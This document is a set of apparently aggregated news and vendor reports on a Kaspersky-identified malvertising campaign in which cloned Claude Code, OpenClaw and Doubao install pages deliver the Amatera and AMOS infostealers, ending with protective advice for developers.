Hackers disguise infostealer malware as Claude Code and OpenClaw to target developers

Infostealers are being disguised as Claude Code, OpenClaw and other AI developer tools

* Kaspersky warns of malvertising campaign abusing Claude Code * Fake download sites deliver Amatera infostealer on Windows, AMOS on macOS * Developers risk exposing source code, corporate data, and credentials Hackers are, once again, taking advantage of current trends to attack software developers with information-stealing malware. Earlier this week, security researchers Kaspersky warned about an ongoing malvertising campaign targeting people interested in downloading Claude Code. Claude Code is a coding-focused AI assistant developed by Anthropic. It is like a specialized version of the Claude GenAI chatbot, designed specifically to help software developers write, edit, and debug code and, in a sense, is similar to tools like GitHub Copilot, or ChatGPT's coding capabilities. Infected with infostealers According to Kaspersky, some people searching for "Claude Code download", "OpenClaw download", and similar tools, will get a malicious ad shown in the very top of the search engine's results page. Clicking on those ads leads to websites that, in almost every aspect, look identical to the authentic pages set up by Anthropic and OpenAI. To make matters worse, installing Claude Code is not the same as installing an app, or a program. It requires copying and pasting code in the Windows Command Prompt, or macOS Terminal, making the compromise even harder to spot. Those that don't spot it, and try to install these fake assistants, will get a different version of an infostealer, depending on the operating system they are running. Those on Windows will end up getting Amatera, an information-stealing malware that collects data from user directories, web browsers, and cryptocurrency wallets. Kaspersky said it has previously observed Amatera in campaigns using the ClickFix distribution technique and is operated under a Malware-as-a-Service (MaaS) model. On the other hand, macOS users will be infected with the infamous AMOS, a known macOS-oriented infostealer that has been used in countless campaigns against Apple users in the past. "The campaign poses significant risks because AI development tools such as Claude Code and OpenClaw are widely used not only by hobbyists and automation enthusiasts but also by professional developers working in large organizations," said Kaspersky's cybersecurity expert Vladimir Gursky. "If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts. This makes such campaigns particularly dangerous for businesses whose developers rely on AI-assisted coding tools." Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button! And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.

Hackers are disguising malware as Claude Code, and it's easy to fall for the scam

When not writing, Dave enjoys spending time with his family, running, playing the guitar, camping, and serving in his community. His favorite place is the Blue Ridge Mountains, and one day he hopes to retire there (hopefully his fear of heights will have retired by then, too!). Summary Researchers have discovered a new malware campaign targeting AI developer tools. The attack uses sponsored links on Google to impersonate official installation instructions. Targets include popular AI tools like Claude Code and OpenClaw. With the exploding popularity of AI tools, it was only a matter of time before the hackers came calling. The latest run of AI-related malware targets developer tools like Claude Code and OpenClaw, and it's sneaky. Researchers at Kaspersky discovered a campaign targeting developers "looking for installation instructions for Claude Code," according to a post published March 16. How the attack works Malicious commands hiding in plain sight Kaspersky found that when searching for the phrase "Claude Code download," sponsored ads appear at the top of the page (no surprise there). However, the researchers found that one of these ads redirects to a malicious page that looks a lot like the official installation instructions for Claude Code. The timing is unfortunate, as Claude has exploded in popularity over the last several weeks. This malicious page is visually identical to the actual Claude Code instructions, down to the instructions themselves. The difference lies in the installation commands -- when you run the commands from this page, instead of installing Claude, you'll install malware. It seems whoever is behind these attacks is hoping users will just copy and paste the code without double-checking (which, unfortunately, is pretty common). The attacks aren't just targeting Claude Code -- Kaspersky also found similar campaigns targeting "other popular AI tools," specifically naming the viral and very useful OpenClaw and Doubao (an AI tool from ByteDance). They're also not the first attacks of this type to target AI tools. Kaspersky claims it found a similar attack using Google Ads in December 2025. What happens if you run the malicious commands? If you run these fake commands, instead of installing Claude Code, you'll end up with one of two infostealers installed, depending on your OS: Windows: If you're on Windows, the commands will install Amatera. This malware "collects data from user directories, web browsers, and cryptocurrency wallets" and then sends that data off to a remote server. Kaspersky says Amatera has been used in previous campaigns. macOS: macOS users will get AMOS, an infostealer commonly used to target Apple devices. Kaspersky's post highlights the fact that these attacks are specifically targeting developers, which in many cases means it's not just personal info but potentially also business data being stolen. How to stay safe Double-check everything! These attacks are concerning, but should be avoidable as long as you're following basic security best practices. The researchers at Kaspersky offer the following suggestions (paraphrased): Verify links: Always check links, whether they're direct downloads or links to a download page. The malicious sites used in these attacks are hosted on Squarespace, and that's visible in the URL. Verify commands: Don't just blindly copy and paste terminal commands. Always review them before running them -- even if the source looks official. Make sure you understand what you're doing: Don't run commands if you don't know what they do. Use reliable security solutions: Have systems in place to detect malware. Another key point not mentioned here is to follow official links in Google searches, rather than sponsored links. While organic search results can be malicious, you're generally more likely to run into this sort of attack with sponsored links -- especially when the malicious site is attempting to impersonate a legit one. Subscribe to the newsletter for AI security insights Stay informed about AI-related threats -- subscribe to the newsletter for clear, actionable coverage of issues like cloned install pages, malicious commands, and steps to verify links and terminal commands before running them. Get Updates By subscribing, you agree to receive newsletter and marketing emails, and accept our Terms of Use and Privacy Policy. You can unsubscribe anytime. Keep your eyes open out there -- I'd expect AI-related attacks like this to continue to increase in popularity.

Kaspersky discovers infostealers mimicking Claude Code, OpenClaw and other AI developer tools

In March 2026, Kaspersky Threat Research has identified a new malicious campaign targeted at developers looking for installation instructions for Claude Code, a development agent created by Anthropic. When searching for "Claude Code download", sponsored advertisements appear at the top of the search results. One of these ads redirects users to a malicious webpage that closely imitates the official installation documentation for Claude Code. As a result, users are tricked into installing malware which harvests sensitive information including credentials, crypto wallet data, browser sessions, and other confidential files. Similar malicious campaigns mimic other popular AI tools, including OpenClaw. A fraudulent ad example The fake documentation page is visually identical to the legitimate one and is hosted on the website-building and hosting platform Squarespace. Because the page precisely copies the original instructions, users may not notice the difference when copying and executing installation commands. A fraudulent Claude page However, instead of installing the developer tool, the commands deliver malware to the victim's system. Depending on the operating system, the malicious commands deploy different infostealers: * Windows systems receive Amatera, an information-stealing malware that collects data from user directories, web browsers, and cryptocurrency wallets before sending the stolen information to a remote server. Amatera has previously been observed in campaigns using the ClickFix distribution technique and is operated under a Malware-as-a-Service (MaaS) model. * macOS systems receive AMOS, another infostealer previously documented in several malware campaigns targeting Apple devices. It has been described by Kaspersky before. Kaspersky researchers also identified similar malicious campaigns targeting other popular AI tools, including OpenClaw and Doubao. Using the same approach, attackers registered multiple domains and distributed files containing the Amatera infostealer while disguising them as legitimate downloads for these tools. "The campaign poses significant risks because AI development tools such as Claude Code and OpenClaw are widely used not only by hobbyists and automation enthusiasts but also by professional developers working in large organizations. If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts. This makes such campaigns particularly dangerous for businesses whose developers rely on AI-assisted coding tools," comments Vladimir Gursky, cybersecurity expert at Kaspersky. In December 2025 Kaspersky detected that attackers spread a macOS infostealer using Google Ads. A specially generated chat interface designed to resemble a ChatGPT tutorial pretended to guide users through installing the Atlas Browser. The malicious instructions appeared to be hosted on a legitimate site associated with OpenAI, helping attackers gain users' trust. To stay protected, Kaspersky recommends: * Carefully verify download links and ensure they point to official project websites. * Review any command-line instructions before executing them, especially if copied from external sources. * Avoid following guides you did not specifically request or do not fully understand.